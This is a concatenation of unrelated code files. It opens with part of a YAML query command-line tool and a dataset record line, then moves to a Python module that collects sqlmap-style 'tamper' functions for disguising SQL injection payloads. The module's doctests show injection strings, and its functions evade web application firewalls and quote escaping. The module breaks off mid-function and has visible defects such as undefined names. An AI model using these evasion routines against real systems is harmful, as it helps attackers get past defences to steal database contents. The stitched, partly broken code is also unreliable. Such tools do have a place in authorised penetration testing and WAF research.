tokens = (re.sub(r'\\(\\|\.)', r'\1', m.group(0))
for m in re.finditer(r'((\\.|[^.\\])*)', s))
## an empty string superfluous token is added after all non-empty token
for token in tokens:
if len(token) != 0:
next(tokens)
yield token
def mget(dct, key):
r"""Allow to get values deep in recursive dict with doted keys
Accessing leaf values is quite straightforward:
>>> dct = {'a': {'x': 1, 'b': {'c': 2}}}
>>> mget(dct, 'a.x')
1
>>> mget(dct, 'a.b.c')
2
But you can also get subdict if your key is not targeting a
leaf value:
>>> mget(dct, 'a.b')
{'c': 2}
As a special feature, list access is also supported by providing a
(possibily signed) integer, it'll be interpreted as usual python
sequence access using bracket notation:
>>> mget({'a': {'x': [1, 5], 'b': {'c': 2}}}, 'a.x.-1')
5
>>> mget({'a': {'x': 1, 'b': [{'c': 2}]}}, 'a.b.0.c')
2
Keys that contains '.' can be accessed by escaping them:
>>> dct = {'a': {'x': 1}, 'a.x': 3, 'a.y': 4}
>>> mget(dct, 'a.x')
1
>>> mget(dct, r'a\.x')
3
>>> mget(dct, r'a.y') ## doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
MissingKeyError: missing key 'y' in dict.
>>> mget(dct, r'a\.y')
4
As a consequence, if your key contains a '\', you should also escape it:
>>> dct = {r'a\x': 3, r'a\.x': 4, 'a.x': 5, 'a\\': {'x': 6}}
>>> mget(dct, r'a\\x')
3
>>> mget(dct, r'a\\\.x')
4
>>> mget(dct, r'a\\.x')
6
>>> mget({'a\\': {'b': 1}}, r'a\\.b')
1
>>> mget({r'a.b\.c': 1}, r'a\.b\\\.c')
1
And even empty strings key are supported:
>>> dct = {r'a': {'': {'y': 3}, 'y': 4}, 'b': {'': {'': 1}}, '': 2}
>>> mget(dct, r'a..y')
3
>>> mget(dct, r'a.y')
4
>>> mget(dct, r'')
2
>>> mget(dct, r'b..')
1
It will complain if you are trying to get into a leaf:
>>> mget({'a': 1}, 'a.y') ## doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
NonDictLikeTypeError: can't query subvalue 'y' of a leaf...
if the key is None, the whole dct should be sent back:
>>> mget({'a': 1}, None)
{'a': 1}
"""
return aget(dct, tokenize(key))
class MissingKeyError(KeyError):
"""Raised when querying a dict-like structure on non-existing keys"""
def __str__(self):
return self.args[0]
class NonDictLikeTypeError(TypeError):
"""Raised when attempting to traverse non-dict like structure"""
class IndexNotIntegerError(ValueError):
"""Raised when attempting to traverse sequence without using an integer"""
class IndexOutOfRange(IndexError):
"""Raised when attempting to traverse sequence without using an integer"""
def aget(dct, key):
r"""Allow to get values deep in a dict with iterable keys
Accessing leaf values is quite straightforward:
>>> dct = {'a': {'x': 1, 'b': {'c': 2}}}
>>> aget(dct, ('a', 'x'))
1
>>> aget(dct, ('a', 'b', 'c'))
2
If key is empty, it returns unchanged the ``dct`` value.
>>> aget({'x': 1}, ())
{'x': 1}
"""
key = iter(key)
try:
head = next(key)
except StopIteration:
return dct
if isinstance(dct, list):
try:
idx = int(head)
except ValueError:
raise IndexNotIntegerError(
"non-integer index %r provided on a list."
% head)
try:
value = dct[idx]
except IndexError:
raise IndexOutOfRange(
"index %d is out of range (%d elements in list)."
% (idx, len(dct)))
else:
try:
value = dct[head]
except KeyError:
## Replace with a more informative KeyError
raise MissingKeyError(
"missing key %r in dict."
% (head, ))
except Exception:
raise NonDictLikeTypeError(
"can't query subvalue %r of a leaf%s."
% (head,
(" (leaf value is %r)" % dct)
if len(repr(dct)) < 15 else ""))
return aget(value, key)
def stderr(msg):
"""Convenience function to write short message to stderr."""
sys.stderr.write(msg)
def stdout(value):
"""Convenience function to write short message to stdout."""
sys.stdout.write(value)
def die(msg, errlvl=1, prefix="Error: "):
"""Convenience function to write short message to stderr and quit."""
stderr("%s%s\n" % (prefix, msg))
sys.exit(errlvl)
SIMPLE_TYPES = (str if PY3 else basestring, int, float, type(None))
COMPLEX_TYPES = (list, dict)
## these are not composite values
ACTION_SUPPORTING_STREAMING=["get-type", "get-length", "get-value"]
def magic_dump(value):
"""Returns a representation of values directly usable by bash.
Literal types are printed as-is (avoiding quotes around string for
instance). But complex type are written in a YAML useable format.
"""
return str(value) if isinstance(value, SIMPLE_TYPES) \
else yaml_dump(value)
def yaml_dump(value):
"""Returns a representation of values directly usable by bash.
Literal types are quoted and safe to use as YAML.
"""
return yaml.dump(value, default_flow_style=False,
Dumper=ShyamlSafeDumper)
def type_name(value):
"""Returns pseudo-YAML type name of given value."""
return type(value).__name__ if isinstance(value, EncapsulatedNode) else \
"struct" if isinstance(value, dict) else \
"sequence" if isinstance(value, (tuple, list)) else \
type(value).__name__
def get_version_info():
if yaml.__with_libyaml__:
import _yaml
libyaml_version = _yaml.get_version_string()
else:
libyaml_version = False
return ("unreleased" if __version__.startswith('%%') else __version__,
yaml.__version__,
libyaml_version,
__with_libyaml__,
sys.version.replace("\n", " "),
)
def _parse_args(args, USAGE, HELP):
opts = {}
opts["dump"] = magic_dump
for arg in ["-y", "--yaml"]:
if arg in args:
args.remove(arg)
opts["dump"] = yaml_dump
opts["quiet"] = False
for arg in ["-q", "--quiet"]:
if arg in args:
args.remove(arg)
opts["quiet"] = True
for arg in ["-L", "--line-buffer"]:
if arg not in args:
continue
args.remove(arg)
opts["loader"] = LineLoader
if len(args) == 0:
stderr("Error: Bad number of arguments.\n")
die(USAGE, errlvl=1, prefix="")
if len(args) == 1 and args[0] in ("-h", "--help"):
stdout(HELP)
exit(0)
if len(args) == 1 and args[0] in ("-V", "--version"):
version_info = get_version_info()
print("version: %s\nPyYAML: %s\nlibyaml available: %s\nlibyaml used: %s\nPython: %s"
% version_info)
exit(0)
opts["action"] = args[0]
opts["key"] = None if len(args) == 1 else args[1]
opts["default"] = args[2] if len(args) > 2 else None
return opts
class InvalidPath(KeyError):
"""Invalid Path"""
def __str__(self):
return self.args[0]
class InvalidAction(KeyError):
"""Invalid Action"""
def traverse(contents, path, default=None):
try:
try:
value = mget(contents, path)
except (IndexOutOfRange, MissingKeyError):
if default is None:
raise
value = default
except (IndexOutOfRange, MissingKeyError,
NonDictLikeTypeError, IndexNotIntegerError) as exc:
msg = str(exc)
raise InvalidPath(
"invalid path %r, %s"
% (path, msg.replace('list', 'sequence').replace('dict', 'struct')))
return value
class ActionTypeError(Exception):
def __init__(self, action, provided, expected):
self.action = action
self.provided = provided
self.expected = expected
def __str__(self):
return ("%s does not support %r type. "
"Please provide or select a %s."
% (self.action, self.provided,
self.expected[0] if len(self.expected) == 1 else
("%s or %s" % (", ".join(self.expected[:-1]),
self.expected[-1]))))
def act(action, value, dump=yaml_dump):
tvalue = type_name(value)
## Note: ``\n`` will be transformed by ``universal_newlines`` mecanism for
## any platform
termination = "\0" if action.endswith("-0") else "\n"
if action == "get-value":
return str(dump(value))
elif action in ("get-values", "get-values-0"):
if isinstance(value, dict):
return "".join("".join((dump(k), termination,
dump(v), termination))
for k, v in value.items())
elif isinstance(value, list):
return "".join("".join((dump(l), termination))
for l in value)
else:
raise ActionTypeError(
action, provided=tvalue, expected=["sequence", "struct"])
elif action == "get-type":
return tvalue
elif action == "get-length":
if isinstance(value, (dict, list)):
return len(value)
else:
raise ActionTypeError(
action, provided=tvalue, expected=["sequence", "struct"])
elif action in ("keys", "keys-0",
"values", "values-0",
"key-values", "key-values-0"):
if isinstance(value, dict):
method = value.keys if action.startswith("keys") else \
value.items if action.startswith("key-values") else \
value.values
output = (lambda x: termination.join(str(dump(e)) for e in x)) \
if action.startswith("key-values") else \
dump
return "".join("".join((str(output(k)), termination)) for k in method())
else:
raise ActionTypeError(
action=action, provided=tvalue, expected=["struct"])
else:
raise InvalidAction(action)
def do(stream, action, key, default=None, dump=yaml_dump,
loader=ShyamlSafeLoader):
"""Return string representations of target value in stream YAML
The key is used for traversal of the YAML structure to target
the value that will be dumped.
:param stream: file like input yaml content
:param action: string identifying one of the possible supported actions
:param key: string dotted expression to traverse yaml input
:param default: optional default value in case of missing end value when
traversing input yaml. (default is ``None``)
:param dump: callable that will be given python objet to dump in yaml
(default is ``yaml_dump``)
:param loader: PyYAML's *Loader subclass to parse YAML
(default is ShyamlSafeLoader)
:return: generator of string representation of target value per
YAML docs in the given stream.
:raises ActionTypeError: when there's a type mismatch between the
action selected and the type of the targetted value.
(ie: action 'key-values' on non-struct)
:raises InvalidAction: when selected action is not a recognised valid
action identifier.
:raises InvalidPath: upon inexistent content when traversing YAML
input following the key specification.
"""
at_least_one_content = False
for content in yaml.load_all(stream, Loader=loader):
at_least_one_content = True
value = traverse(content, key, default=default)
yield act(action, value, dump=dump)
## In case of empty stream, we consider that it is equivalent
## to one document having the ``null`` value.
if at_least_one_content is False:
value = traverse(None, key, default=default)
yield act(action, value, dump=dump)
def main(args): ## pylint: disable=too-many-branches
"""Entrypoint of the whole commandline application"""
EXNAME = os.path.basename(__file__ if WIN32 else sys.argv[0])
for ext in (".py", ".pyc", ".exe", "-script.py", "-script.pyc"): ## pragma: no cover
if EXNAME.endswith(ext): ## pragma: no cover
EXNAME = EXNAME[:-len(ext)]
break
USAGE = """\
Usage:
%(exname)s {-h|--help}
%(exname)s {-V|--version}
%(exname)s [-y|--yaml] [-q|--quiet] ACTION KEY [DEFAULT]
""" % {"exname": EXNAME}
HELP = """
Parses and output chosen subpart or values from YAML input.
It reads YAML in stdin and will output on stdout it's return value.
%(usage)s
Options:
-y, --yaml
Output only YAML safe value, more precisely, even
literal values will be YAML quoted. This behavior
is required if you want to output YAML subparts and
further process it. If you know you have are dealing
with safe literal value, then you don't need this.
(Default: no safe YAML output)
-q, --quiet
In case KEY value queried is an invalid path, quiet
mode will prevent the writing of an error message on
standard error.
(Default: no quiet mode)
-L, --line-buffer
Force parsing stdin line by line allowing to process
streamed YAML as it is fed instead of buffering
input and treating several YAML streamed document
at once. This is likely to have some small performance
hit if you have a huge stream of YAML document, but
then you probably don't really care about the
line-buffering.
(Default: no line buffering)
ACTION Depending on the type of data you've targetted
thanks to the KEY, ACTION can be:
These ACTIONs applies to any YAML type:
get-type ## returns a short string
get-value ## returns YAML
These ACTIONs applies to 'sequence' and 'struct' YAML type:
get-values{,-0} ## returns list of YAML
get-length ## returns an integer
These ACTION applies to 'struct' YAML type:
keys{,-0} ## returns list of YAML
values{,-0} ## returns list of YAML
key-values,{,-0} ## returns list of YAML
Note that any value returned is returned on stdout, and
when returning ``list of YAML``, it'll be separated by
a newline or ``NUL`` char depending of you've used the
``-0`` suffixed ACTION.
KEY Identifier to browse and target subvalues into YAML
structure. Use ``.`` to parse a subvalue. If you need
to use a literal ``.`` or ``\\``, use ``\\`` to quote it.
Use struct keyword to browse ``struct`` YAML data and use
integers to browse ``sequence`` YAML data.
DEFAULT if not provided and given KEY do not match any value in
the provided YAML, then DEFAULT will be returned. If no
default is provided and the KEY do not match any value
in the provided YAML, %(exname)s will fail with an error
message.
Examples:
## get last grocery
cat recipe.yaml | %(exname)s get-value groceries.-1
## get all words of my french dictionary
cat dictionaries.yaml | %(exname)s keys-0 french.dictionary
## get YAML config part of 'myhost'
cat hosts_config.yaml | %(exname)s get-value cfgs.myhost
""" % {"exname": EXNAME, "usage": USAGE}
USAGE = textwrap.dedent(USAGE)
HELP = textwrap.dedent(HELP)
opts = _parse_args(args, USAGE, HELP)
quiet = opts.pop("quiet")
try:
first = True
for output in do(stream=sys.stdin, **opts):
if first:
first = False
else:
if opts["action"] not in ACTION_SUPPORTING_STREAMING:
die("Source YAML is multi-document, "
"which doesn't support any other action than %s"
% ", ".join(ACTION_SUPPORTING_STREAMING))
if opts["dump"] is yaml_dump:
print("---\n", end="")
else:
print("\0", end="")
if opts.get("loader") is LineLoader:
sys.stdout.flush()
print(output, end="")
if opts.get("loader") is LineLoader:
sys.stdout.flush()
except (InvalidPath, ActionTypeError) as e:
if quiet:
exit(1)
else:
die(str(e))
except InvalidAction as e:
die("'%s' is not a valid action.\n%s"
% (e.args[0], USAGE))
def entrypoint():
sys.exit(main(sys.argv[1:]))
if __name__ == "__main__":
entrypoint()
``` |
{
"source": "0xflotus/SQLi-Query-Tampering",
"score": 3
} |
#### File: 0xflotus/SQLi-Query-Tampering/tamper.py
```python
import collections
import os
import random
import re
import string
class OrderedSet(collections.MutableSet):
"""
This class defines the set with ordered (as added) items
>>> foo = OrderedSet()
>>> foo.add(1)
>>> foo.add(2)
>>> foo.add(3)
>>> foo.pop()
3
>>> foo.pop()
2
>>> foo.pop()
1
"""
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def __contains__(self, key):
return key in self.map
def add(self, value):
if value not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[value] = [value, curr, end]
def discard(self, value):
if value in self.map:
value, prev, next = self.map.pop(value)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def pop(self, last=True):
if not self:
raise KeyError('set is empty')
key = self.end[1][0] if last else self.end[2][0]
self.discard(key)
return key
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self))
def __eq__(self, other):
if isinstance(other, OrderedSet):
return len(self) == len(other) and list(self) == list(other)
return set(self) == set(other)
class SQLiTamper():
def __init__(self):
self._All = [self.chardoubleencode, self.versionedmorekeywords, self.versionedkeywords, self.uppercase, self.unmagicquotes, \
self.unionalltounion, self.symboliclogical, self. space2randomblank, self.space2plus, self.space2mysqldash, \
self.space2mysqlblank, self.space2mssqlhash, self.space2mssqlblank, self.space2morehash, self.space2morecomment, \
self.space2hash, self.space2dash, self.space2comment, self.sp_password, self.randomcomments, self.randomcase, self.plus2fnconcat, \
self.plus2concat, self.percentage, self.overlongutf8more, self.overlongutf8, self.multiplespaces, self.modsecurityzeroversioned, \
self.modsecurityversioned, self.lowercase, self.least, self.informationschemacomment, self.ifnull2ifisnull, self.ifnull2casewhenisnull, \
self.htmlencode, self.hex2char, self.halfversionedmorekeywords, self.greatest, self.escapequotes, self.equaltolike, self.concat2concatws, \
self.commentbeforeparentheses, self.commalessmid, self.commalesslimit, self.charunicodeescape, self.charunicodeencode, self.charencode, \
self.bluecoat, self.between, self.appendnullbyte, self.apostrophenullencode, self.apostrophemask]
self._General = [self.chardoubleencode, self.unmagicquotes, self.unionalltounion, self.symboliclogical, \
self.space2plus, self.randomcomments, self.randomcase, self.overlongutf8more, self.overlongutf8, \
self.multiplespaces, self.htmlencode, self.escapequotes, self.charunicodeescape, self.apostrophenullencode, \
self.apostrophemask, self.between, self.charencode, self.charunicodeencode, self.equaltolike, self.greatest, \
self.ifnull2ifisnull, self.percentage, self.space2randomblank, self.space2comment]
self._MSAccess = [self.appendnullbyte, self.between, self.bluecoat, self.charencode, self.charunicodeencode, self.concat2concatws, \
self.equaltolike, self.greatest, self.halfversionedmorekeywords, self.ifnull2ifisnull, self.modsecurityversioned, \
self.modsecurityzeroversioned, self.multiplespaces, self.percentage, self.randomcase, self.space2comment, self.space2hash, \
self.space2morehash, self.space2mysqldash, self.space2plus, self.space2randomblank, self.unionalltounion, self.unmagicquotes, \
self.versionedkeywords, self.versionedmorekeywords]
self._MSSQL = [self.uppercase, self.space2randomblank, self.space2mysqldash, self.space2mssqlhash, self.space2mssqlblank, \
self.space2dash, self.space2comment, self.sp_password, self.plus2fnconcat, self.plus2concat, self.percentage, \
self.lowercase, self.equaltolike, self.commentbeforeparentheses, self.charunicodeencode, self.charencode, \
self.between, self.greatest, self.multiplespaces, self.randomcase, self.space2plus, self.unionalltounion, \
self.unmagicquotes]
self._MySQL = [self.versionedmorekeywords, self.versionedkeywords, self.uppercase, self.space2randomblank, self.space2mysqldash, \
self.space2mysqlblank, self.space2mssqlhash, self.space2morehash, self. space2morecomment, self. space2hash, \
self.space2comment, self.percentage, self.modsecurityzeroversioned, self.modsecurityversioned, self.lowercase, \
self.least, self.informationschemacomment, self.ifnull2ifisnull, self.ifnull2casewhenisnull, self.hex2char, \
self.halfversionedmorekeywords, self.greatest, self.equaltolike, self.concat2concatws, self.commentbeforeparentheses, \
self.commalessmid, self.commalesslimit, self.charunicodeencode, self.charencode, self.bluecoat, self.between, self.multiplespaces, \
self.randomcase, self.space2comment, self.space2plus, self.unionalltounion, self.unmagicquotes]
self._Oracle = [self.uppercase, self.space2randomblank, self.space2comment, self.lowercase, self.least, self.greatest, \
self.commentbeforeparentheses, self.charencode, self.between, self.equaltolike, self.multiplespaces, \
self.randomcase, self.space2plus, self.unionalltounion, self.unmagicquotes]
self._PostgreSQL= [self.uppercase, self.substring2leftright, self.space2randomblank, self.space2comment, self.percentage, \
self.lowercase, self.least, self.greatest, self.commentbeforeparentheses, self.charunicodeencode, \
self.charencode, self.between, self.equaltolike, self.multiplespaces, self.randomcase, self.space2plus]
self._SAP_MaxDB = [self.ifnull2ifisnull, self.ifnull2casewhenisnull, self.randomcase, self.space2comment, self.space2plus, \
self.unionalltounion, self.unmagicquotes]
self._SQLite = [self.space2dash, self.ifnull2ifisnull, self.ifnull2casewhenisnull, self.multiplespaces, self.randomcase, \
self.space2comment, self.space2plus, self.unionalltounion, self.unmagicquotes]
self.keywords = set(self.getFileItems('keywords.txt'))
self.techniques = {
'All':self._All,
'General':self._General,
'MSAccess':self._MSAccess,
'MSSQL':self._MSSQL,
'MySQL':self._MySQL,
'Oracle':self._Oracle,
'PostgreSQL':self._PostgreSQL,
'SAP_MaxDB':self._SAP_MaxDB,
'SQLite':self._SQLite
}
def randomInt(self, length=4, seed=None):
"""
Returns random integer value with provided number of digits
>>> random.seed(0)
>>> self.randomInt(6)
963638
"""
choice = random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
def getFileItems(self, filename, commentPrefix='#', lowercase=False, unique=False):
"""
Returns newline delimited items contained inside file
"""
retVal = list()
if filename:
filename = filename.strip('"\'')
try:
with open(filename, 'r') as f:
for line in f:
if commentPrefix:
if line.find(commentPrefix) != -1:
line = line[:line.find(commentPrefix)]
line = line.strip()
if line:
if lowercase:
line = line.lower()
if unique and line in retVal:
continue
if unique:
retVal[line] = True
else:
retVal.append(line)
except (IOError, OSError, MemoryError) as ex:
errMsg = "something went wrong while trying "
errMsg += "to read the content of file ''" % filename
raise Exception(errMsg)
return retVal if not unique else list(retVal.keys())
def chardoubleencode(self, payload, **kwargs):
"""
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
Notes:
* Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
return retVal
def versionedmorekeywords(self, payload, **kwargs):
"""
Encloses each keyword with (MySQL) versioned comment
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "/*!%s*/" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal)
retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
return retVal
def versionedkeywords(self, payload, **kwargs):
"""
Encloses each non-function keyword with (MySQL) versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 4.0.18, 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
"""
def process(match):
word = match.group('word')
if word.upper() in self.keywords:
return match.group().replace(word, "/*!%s*/" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal)
retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
return retVal
def uppercase(self, payload, **kwargs):
"""
Replaces each keyword character with upper case value (e.g. select -> SELECT)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> tamper('insert')
'INSERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in self.keywords:
retVal = retVal.replace(word, word.upper())
return retVal
def unmagicquotes(self, payload, **kwargs):
"""
Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
>>> tamper("1' AND 1=1")
'1%bf%27-- -'
"""
retVal = payload
if payload:
found = False
retVal = ""
for i in xrange(len(payload)):
if payload[i] == '\'' and not found:
retVal += "%bf%27"
found = True
else:
retVal += payload[i]
continue
if found:
_ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
if _ != retVal:
retVal = _
retVal += "-- -"
elif not any(_ in retVal for _ in ('#', '--', '/*')):
retVal += "-- -"
return retVal
def unionalltounion(self, payload, **kwargs):
"""
Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""
return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload
def symboliclogical(self, payload, **kwargs):
"""
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))
return retVal
def substring2leftright(self, payload, **kwargs):
"""
Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
Tested against:
* PostgreSQL 9.6.12
Note:
* Useful to bypass weak web application firewalls that filter SUBSTRING (but not LEFT and RIGHT)
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
"""
retVal = payload
if payload:
match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload)
if match:
pos = int(match.group(2))
if pos == 1:
_ = "LEFT(%s,1)" % (match.group(1))
else:
_ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos)
retVal = retVal.replace(match.group(0), _)
return retVal
def space2randomblank(self, payload, **kwargs):
"""
Replaces space character (' ') with a random blank character from a valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
"""
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
blanks = ("%09", "%0A", "%0C", "%0D")
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == ' ' and not doublequote and not quote:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
def space2plus(self, payload, **kwargs):
"""
Replaces space character (' ') with plus ('+')
Notes:
* Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards
* This tamper script works against all databases
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "+"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "+"
continue
retVal += payload[i]
return retVal
def space2mysqldash(self, payload, **kwargs):
"""
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
Requirement:
* MySQL
* MSSQL
Notes:
* Useful to bypass several web application firewalls.
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
retVal += "--%0A"
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2mysqlblank(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
Requirement:
* MySQL
Tested against:
* MySQL 5.1
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'
"""
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
# A0 non-breaking space
blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
def space2mssqlhash(self, payload, **kwargs):
"""
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
Requirement:
* MSSQL
* MySQL
Notes:
* Useful to bypass several web application firewalls
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""
retVal = ""
if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
retVal += "%23%0A"
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]
return retVal
def space2mssqlblank(self, payload, **kwargs):
"""
Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
Requirement:
* Microsoft SQL Server
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'
"""
# ASCII table:
# SOH 01 start of heading
# STX 02 start of text
# ETX 03 end of text
# EOT 04 end of transmission
# ENQ 05 enquiry
# ACK 06 acknowledge
# BEL 07 bell
# BS 08 backspace
# TAB 09 horizontal tab
# LF 0A new line
# VT 0B vertical TAB
# FF 0C new page
# CR 0D carriage return
# SO 0E shift out
# SI 0F shift in
blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace, end = False, False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
end = True
elif payload[i] == " " and not doublequote and not quote:
if end:
retVal += random.choice(blanks[:-1])
else:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
def space2morehash(self, payload, **kwargs):
"""
Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
Requirement:
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.41
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'
"""
def process(match):
word = match.group('word')
